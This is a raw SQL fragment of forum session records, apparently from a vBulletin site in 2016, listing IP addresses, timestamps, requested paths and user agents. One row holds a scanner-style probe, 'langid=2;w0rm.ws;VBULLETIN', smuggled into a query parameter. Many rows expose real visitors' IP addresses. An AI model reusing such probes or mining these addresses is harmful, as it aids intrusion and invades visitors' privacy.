('7df413a875ac80e17575faa236b2d1cc', 0, '23.94.91.63', 'a340809325fdfca15efe460af4a7fed2', 1474487813, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0d83251496b6d4d134c44037f3a60b28', 0, '45.40.35.120', '58bf870f58de7378a325e1e14cd285ae', 1474491288, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6c988c8dc94ae0588d9b72281cd8eaaa', 0, '23.106.22.33', 'b255bc35b93962ede31f587774d6c75b', 1474495599, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('196e8d38691b62262e17c2638f39fad6', 0, '92.63.91.74', '8393a394ee443981cc5f6d086f9699f8', 1474496999, '/showthread.php?t=2383', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('af7d3e38cbe823c4a768fc662e96f08e', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474507908, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('04ea5fa73c7ab0fb5aaa950c6b07e98d', 0, '45.40.32.182', '1babc7307923a54b8bc8538d3433f4e9', 1474516627, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0bdaf8d048e5456edb651e66ca6f2f6f', 0, '109.236.92.172', 'de436d80a66f949515b3ad3a0a43a6f1', 1474549508, '/memberlist.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2832.2 Safari/537', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2d78852cae45ea3acea971cfb6dd7c6e', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474550675, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a62576c89cd3c0b779fb41671b064647', 0, '185.34.94.7', '69d0e69fc749da4e1e79fbfc14513839', 1474553607, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2949850a9975a7e1c326d1a1947edff4', 0, '65.49.68.187', 'f210d1a9ee39ec5a1e346fa62bacab40', 1474554142, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d576c7ddd00d20cc7ff8855436b8904a', 0, '85.118.134.144', 'f66eb58cdbf681f3c88cd642734051f7', 1474554671, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6a5cd95f34aa0a0d5c8167829ad0af6f', 0, '23.82.41.64', '37eca34137340fd292495b133c86a342', 1474556094, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('35fde243863fa7381f3d8f45c644108f', 0, '23.236.240.246', 'e04190be1048b9517567e4e2ed134a1a', 1474560406, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ccb7eaaad541d0df291225116f603143', 0, '207.46.13.114', '5e207e311e22cdc3b2095126a922fa93', 1474565857, '/misc.php?do=showrules', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('814ee5774db627d645c558676db51a26', 0, '40.77.167.29', 'c5490a5a8e1813ac25cf9e19091dcb85', 1474565896, '/showthread.php?t=1835', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5391eb95e64f4fbde237a5b14ba79d4e', 0, '172.68.58.86', '13a414b18abf08821994b25e0a5ebc56', 1474574228, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1e6214d4bc7bda604eabafce6e19a1f0', 0, '37.139.161.108', '6bf62cdc351a7e2ca5dc6a2f28e4ce2f', 1474575885, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de1ac8a904412bd1aa551b273e9aeaa8', 0, '41.140.123.92', '85a91519171d9c24d873690306b1042b', 1474576584, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb41bda76413614b24ff1275ef7a278c', 0, '198.12.120.124', '27173b6d07abdbf2cbf25eb1ad294261', 1474592954, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('330927110b416fd2daaddf4fa6e741d2', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474593413, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d9a86cd28f06833008170ac8ee82bad0', 0, '180.253.66.91', '2dbefa69aff8636a383da2de1720d40e', 1474601312, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fea5296bab79f841b835a29baf90a36b', 0, '68.180.228.225', '9d8a8ad3406087c14548478984f3ed76', 1474880113, '/showthread.php?p=2878', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ab18199137149b97bfcb01a35fa4ec71', 0, '194.179.40.5', 'd3c09eb0e1427515178a793eecb820ea', 1474628564, '/register.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bfed66d056444b191409d06ede33ed76', 0, '45.32.42.95', 'b93cc26ab7ed43ce89ede0b5b51993de', 1474630873, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e66f6f36366057a044884830190a51a9', 0, '116.108.219.146', '6764fe2961f3cf3a552f2bd8f7231684', 1474632535, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('80875b684313f320cea2b071e4719611', 0, '88.128.80.79', '8153798555df64fe722cd87917900323', 1474633751, '/index.php?', 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('49d6f68b1badf16e9c55da9b19ee07a9', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474636306, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('8f3d294698ab3b170785980af584456e', 0, '72.52.116.247', '0b282593897e804fc471346aac59e15a', 1474638431, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d64e6369ce0ef9f7dd5802a14d34b1b7', 0, '23.105.150.61', 'f62e98fd1911a7072549d9e3ac218ff6', 1474639031, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a746867f441c36a76a85945e392bfc72', 0, '109.64.84.43', '56351e1f9c82e599e918eea67e27ce02', 1474641406, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ab09ff0ca4e8e42630bc8219366dedde', 0, '107.172.172.84', '34df86cd2203c5db69d3e375a51f05ea', 1474642496, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1c742fa1f2394d4063ed18b339ddc00d', 0, '45.40.40.41', '39cf41a837f18a6d491a94896741ace9', 1474642508, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6bafbd769776ff603ee8a47482f60edf', 0, '23.94.189.48', 'a8c6e0c6b035a1b677c7c263b702bc67', 1474642646, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a8ea0b07276e4803270f441d8c9cf759', 0, '86.19.29.55', 'e9d6ce693571cb6953e775bdbdacfadb', 1474645616, '/showthread.php?p=3012', 'Mozilla/5.0 (Linux; Android 6.0.1; ONEPLUS A3003 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d12c34ae71027405862944949b92a64f', 0, '45.40.32.33', '79ae12ed5ba369c8eaac07f5092ebd23', 1474646809, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('159353a432bc5ed8b87c77d1d7c760ce', 0, '45.40.38.100', '693bbfd48d0fe37bed316df66a139d21', 1474649287, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9143cd2a18e314f6812180dd97fb1fa8', 0, '107.172.183.29', 'c0b376fb6ed4fe7346c63d6be01734a9', 1474652159, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b7668eaa54a8b3fcc2f82d743eafcba1', 0, '104.168.67.28', '3d4810c7fd82494dbf6ee95fcd32b053', 1474658181, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('91bdf7515df70a31115b5cf539fbd60f', 0, '24.105.216.146', 'fa92c8a4959b4ffc424b4006eb4ca5a4', 1474662147, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d44c674ba49ac30df937a338bd86d728', 0, '54.71.84.13', '9961729b8ab7ba6615424d97daba4a3b', 1474660163, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('348b39bcd88c392fea8682c195b67e9a', 0, '23.94.171.115', '568b12eef20973903178388088acdc86', 1474662707, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('047793edb120953fb7426868f73d4860', 0, '2a01:4a0:2b::2', '28e2f553ad3af12605552f912aba83a1', 1474663778, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('78857848e0247415281d0eb927d37955', 0, '23.81.242.142', '5411a9e48002bde5afb8d2d95716d8e2', 1474670889, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('301301c1d31489d3fea742d4474fddc0', 0, '94.196.105.155', '620929c8b1a0ff0e93d55226265ab428', 1474673716, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a59e60363c98e2ea0970d5eb135316cc', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474679509, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c056801821aef7b61f3d7b930269294c', 0, '149.255.104.204', '190cfb4f9e803cfd3c7abd054e29ebb8', 1474684325, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c8180d999432fa2159f7abfc05acd3b3', 0, '85.135.161.199', 'afd13f46fd8e9463427c42eff2ef4ae1', 1474690063, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('24b40821ed07b81e3dd2d79cf9ae7ea4', 0, '85.118.134.144', 'ad8d20d7bcd2812592b45c47bc97553d', 1474695182, '/index.php?langid=2', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e90c01df58103f67bc12109b6368b560', 0, '1.55.180.78', 'a98fecf20b107a9696ce7418293d468d', 1474696310, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b873eab3becf8f3acc24317fdd0f647d', 0, '195.22.127.184', '3785c1fc4a3bce45d3ec9e36cf0695d6', 1474698794, '/index.php?langid=2;w0rm.ws;VBULLETIN;24-09-2015', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de85fac4e3a5fe21cc0204339d807cfe', 0, '192.3.110.164', '77ab63a2b80e32f88925cb1a761a8a1c', 1474698800, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('761564d01eb715118fe41e612e31190c', 0, '66.249.79.72', '1f427e4d6723ae757ae768f9466ee93a', 1474714607, '/showthread.php?p=2316', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('538ebab7f41d47592bc58fbbf411d2b1', 0, '188.193.26.218', 'dea0eaab950d6f9317b79ee3f9ef3e0e', 1474715947, '/showthread.php?t=2346', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d15df9ef2b3d9ebf3060a378e849dc92', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474722460, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('32427e034fac85a929ee98d7d677d0c2', 0, '198.23.171.138', '95b20d1fcedb8dffef1395c47f481e24', 1474725432, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ee8c4ef475b2a453b7df73f4e696acf5', 0, '100.43.91.5', '93ab97da9dc26f9bfa5e70cf3f4ccafc', 1475337985, '/showthread.php?t=1674', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b84472048955a857aeae2f612026160f', 0, '45.40.35.49', '58bf870f58de7378a325e1e14cd285ae', 1474727506, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e5bca26dad0f0f3cddb6f5b1b2c9ffc', 0, '172.68.10.246', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1474728089, '/misc.php?do=whoposted&t=2477', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2ec5455933c233ffbd19997dfaeb477d', 0, '104.168.70.13', '81b089658963d6ebe58aaf3fa55dc5a5', 1474730651, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('055aff4bf2e33f6003a87f17901abeb8', 0, '23.19.212.102', '80c1e3918cda079aefd4ae0fe0c95279', 1474734555, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a4941245794c966ca892edf33713d19e', 0, '172.68.58.96', 'dce73380cf0fd3aff82da93d9252bb04', 1474735567, '/showthread.php?p=2855', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d938c2974b3aac3ec1d27f9ce185f5cb', 0, '172.68.11.204', '383053cfad5a4a23a659cdc861561d69', 1474741473, '/showthread.php?t=2480', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c7df81b06686addea51d75518aa6f449', 0, '66.249.69.124', 'dce73380cf0fd3aff82da93d9252bb04', 1474746473, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e1150273b5643dc5862670e2dbb97f38', 0, '172.68.59.88', 'dce73380cf0fd3aff82da93d9252bb04', 1474747014, '/search.php?searchthreadid=2394', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1ac6b700b4f95a2db4237d828427015', 0, '149.172.224.52', '816cd8a888c857f898e77f234a7e2e4e', 1474750807, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6b7b2052ff56558561c72268c9d2efa8', 0, '45.40.37.229', '0600e3db224eac87a0c01e80398fd20e', 1474756263, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8fe48908e3e98e1277d91836ffcd0d3b', 0, '23.108.97.95', '72fe5c1d881841a632102dffdc6771fe', 1474757390, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('505a2f273e0d0035e558842cc55c3aff', 0, '207.46.13.177', '5e207e311e22cdc3b2095126a922fa93', 1474758288, '/showpost.php?p=1034&postcount=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('496077f0b32e52a791caa0b03c95b23c', 0, '207.46.13.29', '5e207e311e22cdc3b2095126a922fa93', 1474758291, '/showthread.php?mode=hybrid&t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('11d119388777baced4bfbf2d3547211c', 0, '85.118.134.144', '4a670fd2c992cfc93907c458c88fb55e', 1474764268, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a5208ae88fd72aadeeadc62340e8e646', 0, '66.249.69.72', 'dce73380cf0fd3aff82da93d9252bb04', 1474760811, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('da2291ce2b2cb6d36e0141bc4960f9a4', 0, '157.55.39.110', '23f3103f44bc3badcba53554e5e4cb6d', 1474760880, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8c28d112cd8094690dccc339d56b1e4f', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474765237, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a7483c8892fdf29d13db0ba9c623665a', 0, '104.168.32.104', 'ccbcfc66c499567c42fb5729aee3a12c', 1474767320, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('65650a971b3375277d3cba6e0930c9e0', 0, '23.95.245.10', '3fc96804f2522d7855a1772d2f0cb582', 1474774245, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('35f4d893c96663202f772f874eb98afd', 0, '172.68.59.80', 'a938925ca9403f145c82d10ebc1ecbe1', 1474781776, '/member.php?u=247', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('374195fac5429abdb6ee409bbe850cc8', 0, '109.163.234.4', '0f3af0a35eaf01f7fb867e77606a09ff', 1474787159, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e7edb3b65b4a6f74cd27e7a95a1f4318', 0, '94.242.246.24', 'e31736756354e678a339a7ac6e428482', 1474797670, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3cb4e16da8902b16819a61342d4f9afa', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474807889, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5ab0e5fd3168c3b0ac739f1a83257d51', 0, '92.49.210.62', 'c324506444a931416e75cb9b3d55a43d', 1474808483, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('079bf2402074d2806b48c119c10a26cc', 0, '41.104.182.36', 'edc407284f8bd82fa0d0ff033cdfc667', 1474809718, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8f15d6e3e3b2ae07381948a835cb87e6', 0, '198.7.62.204', '3e46031dcadf1e30dd8a0771a54d34ce', 1474813792, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('87790b35ac06c0455a5f7f4101b7a711', 0, '36.45.164.147', '88429ffe94150d93e0fea47a4758a89b', 1474821565, '/index.php', 'Mozilla/5.0 (Linux; U; Android 5.0.2; zh-CN; ALE-UL00 Build/HuaweiALE-UL00) AppleWebKit/534.30 (KHTM', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('70942ceedcc997d3bb4eb576dcd57716', 0, '104.168.50.114', '350913cc953f3ac84d314e26fe3c59af', 1474842678, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d8aa73fd2f899eecb24b497f03de74af', 0, '192.3.199.119', '6e4643b7ba39bd43f82c66b589399c23', 1474843799, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('72f1a925c57c5735e4e6a3e4af91972e', 0, '40.143.136.38', '062858e0e5f225540f3782fac45d6992', 1474844296, '/index.php', 'python-requests/2.11.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f17e23508704c776739208088a384963', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474850685, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7a7db5978bac63fca5869e9391c0ebce', 0, '23.106.179.56', '684d7d21856948869d543ed5a463d380', 1474860659, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('65f993855f47024269799c7844fe1547', 0, '46.227.67.188', '39d74d93383516ab3253a084f4e723f2', 1474861136, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bf485db1fad2e6c93b167eeb38085123', 0, '190.46.65.227', 'cc0243c8f771779ac7cc3a647fa1998b', 1474871315, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ff20c39e98aca70fb13d5c7a96adc836', 0, '141.0.13.132', '0228faca3eb6657f0b910e7ac5a6e5d1', 1474885220, '/faq.php', 'Opera/9.80 (Android; Opera Mini/10.0.1884/37.8923; U; en) Presto/2.12.423 Version/12.16', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b83cb9038551ad11c8ceabda11b6d32f', 0, '199.21.99.214', 'c6908eee552f699c1baec76a636d1a60', 1474887209, '/showthread.php?mode=hybrid&t=2469', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Versio', 0, 0, 0, 0, 0, 0, 2, 0, 0),
